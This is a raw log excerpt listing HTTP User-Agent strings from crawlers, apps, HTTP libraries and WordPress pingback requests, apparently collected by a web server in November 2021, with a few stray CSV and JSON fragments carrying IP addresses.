+Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1635953840-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635898311-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635907830-0 +Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML%2C like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) +Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML%2C like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML%2C like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML%2C like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot) +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML%2C like Gecko) Chrome/94.0.4606.81 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +TuneIn Radio/18.4 (Android 30; SM-A705FN; Java) +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.4 (KHTML%2C like Gecko) Version/9.0.1 Safari/601.2.4 facebookexternalhit/1.1 Facebot Twitterbot/1.0 +AvsDeviceSdk/1.16.0 +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm), XFF:157.55.39.126 +okhttp/4.9.2 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635985156-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635985157-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635994627-0 +WhatsApp/2.2142.12 N +Apache-HttpClient/4.5.9 (Java/1.8.0_312) +WhatsApp/2.21.211.2 i +WordPress/5.4.7; http://debarras-maisons.fr; verifying pingback from 2001:470:c406:fb71:accb:ab7a:9652:efa3 +WordPress/5.8.1; https://massa-muscular.com +WordPress/5.8.1; https://newcleaning.xyz +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636054281-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635988273-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635997897-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 MicroAdBot/1.1 (https://www.microad.co.jp/contact/) +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/95.0.4638.69 Mobile Safari/537.36 +MetaInspector/5.7.0 (+https://github.com/jaimeiniesta/metainspector) +Goose/3.1.8 +WordPress/5.8.1; https://sexpornoespana.nudeviesta.buzz +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1636049699-0 +WhatsApp/2.21.22.23 A +WhatsApp/2.21.23.5 A +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html),gzip(gfe) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 5.1; GT-S5360 ) U2/1.0.0 Mobile +WordPress/5.8.1; https://nomerdoma74.ru +WordPress/5.8.1; https://porno991.xyz +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636016787-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.6.0.706 (SpeedMode; Proxy; Android 6.0; i7 ) U2/1.0.0 Mobile +PycURL/7.43 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1636074865-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1636087666-0 +axios/0.22.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636098588-0 +WhatsApp/2.21.16.17 A +Python/3.7 aiohttp/3.8.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 OPR/80.0.4170.63 +WordPress/5.8.1; http://xn--80aaaaiud9bovpa.xn--p1ai +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636075049-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636075105-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1636088568-10 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; GoogleAdwordsExpress) Chrome/95.0.4638.69 Safari/537.36 +yacybot (/global; amd64 Linux 5.14.0-2-amd64; java 16.0.2; Europe/es) http://yacy.net/bot.html +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.3.0.1130 (SpeedMode; Proxy; Android 8.0.0; SM-J330G ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1636156215-0 +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm), XFF:40.77.167.32 +Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm), XFF:40.77.167.32 +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm), XFF:157.55.39.38 +GoogleAuth/1.4 (guamna QZAS30.Q4-39-35-9); gzip,gzip(gfe),gzip(gfe) +GoogleAuth/1.4 (guamna QZAS30.Q4-39-35-9); +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1636158425-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 5.1.2; SM-J727T1 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1636164795-0 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1636170764-0 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1636171518-0 +WordPress/5.8.1; https://phpqaw.cc +WordPress/5.8.1; http://www.architecture-student.com; verifying pingback from 2001:470:c406:5344:64c5:62b7:1ed9:c3a2 +WordPress/4.7.21; http://muja-dental.aatsystems.de; verifying pingback from 2001:470:c406:2990:4a19:fb45:b654:e7f1 +WordPress/3.5.2; http://www.klingert-malerservice.de +WordPress/4.2.30; http://demo.olevmedia.net/metro; verifying pingback from 68.183.158.243 +WordPress/5.0.14; http://www.bkmamsen.dk; verifying pingback from 2001:470:c406:373a:af83:576f:e6f2:16b2 +WordPress/5.7.3; https://www.if-solutions.gr +WordPress/5.8.1; http://www.jardineriasalas.com; verifying pingback from 2001:470:c406:a459:a071:14a5:1661:9c6e +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636173241-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636185941-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636172843-0 +WordPress/5.8.1; https://webcam-driver.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636192226-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636214492-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 9; HTC_Desire_601_dual_sim ) U2/1.0.0 Mobile +WordPress/5.8.1; https://unpictures.ru +ddg_android/5.100.0 (com.duckduckgo.mobile.android; Android API 29) +WordPress/5.8.1; https://keybooster.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636229514-0 +okhttp/3.12.5, XFF:93.56.161.134 +okhttp/3.12.5, XFF:176.201.22.91 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 +WordPress/5.8.1; https://fireservices.info +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636316042-0 +WordPress/5.8.1; http://soumissionfondation.com +WordPress/5.7.2; http://kusvitto.com +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) adbeat.com/policy Gecko/20100101 Firefox/93.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636292492-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636302753-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1636246099-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1636252268-0 +WordPress/5.8.1; https://questions.pcsteps.gr +ddg_android/5.100.0 (com.duckduckgo.mobile.android; Android API 30) +WordPress/5.8.1; https://stop-klesch.ru +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve.k8s.crawler-production/1636267214-60 +ddg_android/5.100.0 (com.duckduckgo.mobile.android; Android API 31) +Mozilla/5.0 SeznamEmailProxy/0.0.48 +Apache-HttpClient/4.5.13 (Java/1.8.0_262) +axios/0.21.4, XFF:35.228.69.34 +axios/0.21.4, XFF:34.89.104.228 +axios/0.21.4, XFF:34.89.19.78 +Python-httplib2/0.20.2 (gzip) +axios/0.21.4, XFF:34.88.151.199 +axios/0.21.4, XFF:35.189.120.47 +Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm), XFF:40.77.167.11 +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm), XFF:40.77.167.11 +curl/7.80.0-DEV +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 +WordPress/5.2.12; http://www.amorequietplace.com; verifying pingback from 2001:470:c406:908d:7351:97a6:1208:4df1 +WordPress/5.2.12; http://www.killerexe.de; verifying pingback from 2001:470:c406:7229:931b:24c7:631d:2d00 +WordPress/4.3.26; http://zinnober-kreativ.de; verifying pingback from 2001:470:c406:596f:a347:b8f3:308a:1ff0 +WordPress/5.8.1; https://winkhaus-shop.ru +WordPress/5.4.7; http://iglesiaedr.org; verifying pingback from 2001:470:c406:c4e7:849:7254:e3e6:9ab9 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.3.0.1130 (SpeedMode; Proxy; Android 7.1.2; SM-N900 ) U2/1.0.0 Mobile +IRLbot/2.0 (+http://irl.cs.tamu.edu/crawler) +Offline Explorer/1.4 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636362023-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636362021-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636382673-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636393789-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636333810-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636340994-0 +WordPress/5.7.2; https://door39.ru +WordPress/5.8.1; https://servisneva.ru +axios/0.21.4, XFF:34.142.105.112 +axios/0.21.4, XFF:34.88.128.177 +axios/0.21.4, XFF:34.89.94.204 +axios/0.21.4, XFF:35.228.146.233 +axios/0.21.4, XFF:35.228.57.54 +axios/0.21.4, XFF:35.228.98.243 +axios/0.21.4, XFF:34.89.10.236 +Cronet/94.0.4606.61),gzip(gfe)",Other,Other,Other,Other,,, 691685328667,2021-11-08 05:48:26 UTC,79.133.187.79,,No,kz,jambyl province,,"grpc-java-okhttp/1.42.0- +691685328667,2021-11-08 03:39:45 UTC,79.133.187.79,,No,kz,jambyl province,,"com.google.android.gms/213918037 (Linux; U; Android 10; ru_RU; M2004J19C; Build/QP1A.190711.020; Cronet/94.0.4606.61) grpc-java-cronet/1.42.0- +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636467584-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636486413-0 +HTTPClient/1.0 (2.8.3, ruby 2.7.4 (2021-07-07)) +PHP/7.3.17 +WordPress/5.3.9; http://mijo.vagskal.se.vagskal.se; verifying pingback from 2001:470:c406:d4e4:42d1:6120:80e9:e474 +WordPress/5.8.1; https://royan-communication.fr +WordPress/5.2.5; http://engex.eng.br +WordPress/4.5.24; http://www.vectalia.fr; verifying pingback from 2001:470:c406:1b1d:a5bd:7961:dd59:a851 +WordPress/4.8.17; http://pcp.com.mx/if; verifying pingback from 2001:470:c406:ee5a:e75b:c9e4:45f0:cd4a +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636469609-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636469626-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636498738-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636501333-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1636420903-0 +WhatsApp/2.21.23.10 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1636430819-0 +Screaming Frog SEO Spider/16.3 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636468385-0 +WhatsApp/2.21.22.26 A +Mozilla/5.0 (en-us) AppleWebKit/537.36(KHTML, like Gecko; Google-Adwords-DisplayAds-WebRender;) Chrome/95.0.4638.69Safari/537.36 +WordPress/5.8.1; https://c-n.vn +axios/0.21.4, XFF:34.88.65.135 +axios/0.21.4, XFF:35.228.163.157 +TuneIn Radio/17.7 (Android 15; GT-P3100; Java) +axios/0.21.4, XFF:35.228.83.220 +GoogleAuth/1.4 (mdh30lm QKQ1.200730.002); gzip,gzip(gfe), +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1636504019-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1636512044-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 4.4.4; IdeaTabA1000-G ) U2/1.0.0 Mobile +WordPress/5.7.3; http://www.andreblinkilde.dk; verifying pingback from 50.3.193.94 +WordPress/5.2.12; http://www.killerexe.de; verifying pingback from 2001:470:c406:db3e:71a:1b9d:a2c4:928 +Goldfire Server +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636555596-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1636506897-0 +WhatsApp/2.21.23.12 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1636514914-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636528166-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636528165-0 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/98.0.4697.0 Safari/537.36 +WhatsApp/2.21.220.17 i +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636555587-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636555575-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.5.2.1188 (SpeedMode; Proxy; Android 5.1.1; HTC_Desire_601_dual_sim ) U2/1.0.0 Mobile +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: s~virustotalcloud) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 5.1.1; AS-5433_Secret ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 8.1.0; DLI-TL20 ) U2/1.0.0 Mobile +WordPress/5.8.1; https://sibweek.ru +WordPress/5.3.9; https://lapki-tapki.ru +WhatsApp/2.21.22.27 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1636506780-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1636514938-0 + +axios/0.21.4, XFF:34.142.81.41 +axios/0.21.4, XFF:34.142.57.204 +axios/0.21.4, XFF:35.228.208.238 +axios/0.21.4, XFF:35.228.119.191 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 6.0.1; LG-X230 ) U2/1.0.0 Mobile +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5 skype-url-preview@microsoft.com +PHP/6.2.52 +PHP/5.3.77 +WordPress/5.7.4; http://www.lespiecesmontees.com; verifying pingback from 2001:470:c406:aae0:33c6:debd:7faa:1620 +WordPress/5.7.4; https://parismabelle.com; verifying pingback from 163.172.51.184 +WordPress/5.8.2; https://www.maciste.world; verifying pingback from 2001:470:c406:ac31:6ccb:c1e4:6895:137e +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4608.0 Mobile Safari/537.36 PTST/210616.175658 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636611733-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Edg/94.0.992.50 +WordPress/5.8.2; https://stereo-jazz.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636651563-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636660213-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636660117-10 +Python/3.8 aiohttp/3.8.0 +yacybot (/global; amd64 FreeBSD 13.0-RELEASE-p4; java 16.0.2; Europe/en) http://yacy.net/bot.html +WordPress/5.8.2; https://www.binarytides.com +WhatsApp/2.21.221.1 i +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636643490-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636673805-0 +http_get +WordPress/5.8.2; https://keybooster.ru +WordPress/5.8.2; https://webpodrugi.ru +axios/0.21.4, XFF:35.197.247.49 +Mozilla/5.0 (compatible; proximic; +https://www.comscore.com/Web-Crawler)","ip":"54.145.247.173" +axios/0.21.4, XFF:35.228.213.17 +axios/0.21.4, XFF:35.228.195.41 +axios/0.21.4, XFF:35.228.182.211 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636684112-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636710358-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 +WordPress/4.7.21; http://www.cmsmarche.it; verifying pingback from 45.57.193.207 +WordPress/5.7.4; https://multimediabomb.com; verifying pingback from 138.128.5.37 +WordPress/5.8.2; http://speed57.com +WordPress/5.8.2; https://rucore.net/p +WordPress/5.8.2; http://bruchsal-bw.de; verifying pingback from 2001:470:c406:9c32:b42:736f:29d2:f0f1 +WordPress/5.7.4; https://service.kompakt.com.ua +WordPress/5.5.7; https://galaktyczny.pl +WordPress/5.8.2; http://soumissionfondation.com +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 8.0.0; GT-S5360 ) U2/1.0.0 Mobile +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler+aardwolf-crawler-17@moz.com) +WordPress/5.7.4; http://gjstudija.net +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636752100-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1636678579-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1636685053-0 +WhatsApp/2.21.23.13 A +WordPress/5.8.2; https://webcam-driver.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1636714518-0 +Mozilla/5.0 (compatible; bingbot/2.0; 